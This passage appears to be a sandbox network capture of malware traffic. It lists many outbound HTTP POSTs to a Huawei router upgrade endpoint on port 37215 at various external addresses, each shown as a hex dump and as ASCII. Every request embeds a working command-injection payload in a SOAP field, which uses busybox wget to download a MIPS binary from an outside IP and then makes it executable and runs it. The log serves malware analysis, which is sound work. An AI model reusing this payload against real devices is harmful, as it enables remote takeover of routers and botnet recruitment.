20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            141192.168.2.133719641.89.132.2837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.990322113 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            142192.168.2.1352860156.29.235.8937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.991203070 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            143192.168.2.1349128156.165.201.24737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.992068052 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            144192.168.2.1333394156.168.136.2437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.992906094 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            145192.168.2.1353342197.218.247.17137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.993726969 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            146192.168.2.1339806197.99.205.15637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.994517088 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            147192.168.2.1358564156.245.2.20537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.995486021 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            148192.168.2.1360446197.226.229.2937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.996135950 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            149192.168.2.133853841.179.145.15237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.996932030 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            150192.168.2.134255641.195.163.18337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.997797966 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            151192.168.2.1359662197.50.100.13537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:37:59.998646021 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
